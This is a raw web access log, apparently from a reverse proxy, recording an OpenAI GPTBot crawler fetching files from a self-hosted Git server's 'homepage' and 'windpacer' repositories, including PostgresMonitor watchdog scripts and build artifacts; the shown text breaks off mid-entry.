git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" [Client 74.7.227.38] [Length 12771] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" [Client 74.7.227.38] [Length 10151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" -[17/Feb/2026:13:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" [Client 74.7.227.38] [Length 9823] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" -[17/Feb/2026:13:58:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" -[17/Feb/2026:13:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10379] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" -[17/Feb/2026:13:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" -[17/Feb/2026:13:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -[17/Feb/2026:13:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -[17/Feb/2026:13:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -[17/Feb/2026:13:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -[17/Feb/2026:13:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -[17/Feb/2026:13:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12240] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10994] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11161] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16192] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16594] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11210] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" -[17/Feb/2026:13:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" -[17/Feb/2026:13:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -[17/Feb/2026:13:58:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:13:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11399] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:13:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10131] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" -[17/Feb/2026:13:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10183] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11782] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10193] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10403] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10408] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10430] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10901] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" -[17/Feb/2026:13:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21222] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build" [Client 74.7.227.38] [Length 10377] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build" -[17/Feb/2026:13:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10931] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17381] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10170] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9510] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10186] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 